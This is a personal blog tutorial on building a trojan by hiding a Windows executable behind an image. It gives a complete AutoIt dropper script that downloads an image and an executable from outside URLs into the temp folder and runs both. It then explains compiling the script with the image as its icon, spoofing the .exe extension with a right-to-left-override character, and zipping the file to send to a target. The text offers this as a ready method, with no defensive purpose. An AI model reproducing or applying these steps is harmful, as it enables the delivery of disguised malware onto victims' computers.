A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
Trojan malware, when opened appears to be a legitimate file opened by the user like opening an image or a document or playing a media file, but in the background, it will run some evil process like someone may be gaining access to your computer through a backdoor or injecting some other harmful code.
In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
The .exe the executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on dropbox for this purpose. In the case of dropbox, modifying the end part of the sharable link to dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable:
https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
URL for my image:
https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg
I have used the image of the sports complex as a cover.
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray
$sFile = _DownloadFile($url)
shellExecute($sFile)
Next
Func _DownloadFile($sURL)
Local $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17, 1)
InetClose($hDownload)
Return $sDirectory
EndFunc ;==>_GetURLImage
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray
$sFile = _DownloadFile($url)
shellExecute($sFile)
Next
Func _DownloadFile($sURL)
Local $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17, 1)
InetClose($hDownload)
Return $sDirectory
EndFunc ;==>_GetURLImage
Save the file with an extension .au3 . I have named the file trojan .au3 .
Since I am using an image as a cover file, Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it - https://cloudconvert.com/jpg-to-ico
The script is written in a scripting language called AutoIt. To install AutoIt in Ubuntu, you can install wine and install AutoIt , or if you want a straightforward way, install Veil from the steps mentioned here https://www.javatpoint.com/installing-veil. AutoIt will be installed in one of the steps after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
The converted file looks like this on a windows machine.
Well, something’s not right. The problem with this file is its extension. It is obvious that is an executable since its extension is .exe . We need to spoof this extension.
To spoof the obvious extension .exe and replace it with .jpeg , we will use a right-to-left-override character.
To know about the detail of how spoofing actually works and where to place the right-to-left-override character, read the blog. Spoofing File Extensions
To summarise the steps mentioned in the above blog:
trojan.exe to trojangpj.exe . right-to-left-override character at the 7th position after trojan. All the characters after the right-to-left-override the character will be flipped i.e read right to left.
The filename now looks like trojanexe.jpg
Since the image contained in the file is of a sports complex I will replace trojan in the name with sportscompl_ so that the file name reads sports_complexe.jpg .
Congrats!!! Your trojan is ready.
Now the filename matches with the image contained. Some recent browsers remove the right-to-left-override before downloading. So it is a good idea to zip the file and send it over.
And that’s a wrap! Hi, I am Gourav Dhar, a software developer and I also write blogs on Backend Development and System Design. Subscribe to my Newsletter “The Geeky Minds” and learn something new every week - https://thegeekyminds.com/subscribe
Other Articles
What is an SSL/TLS Certificate and How do they Secure Your Website?
What are WebSockets? Everything you need to know about WebSockets!
How to create the perfect Pull Request?
I am Gourav Dhar, a 2019 graduate from IIT Roorkee where I pursued my bachelors in Electronics and Communication Engineering.
Know More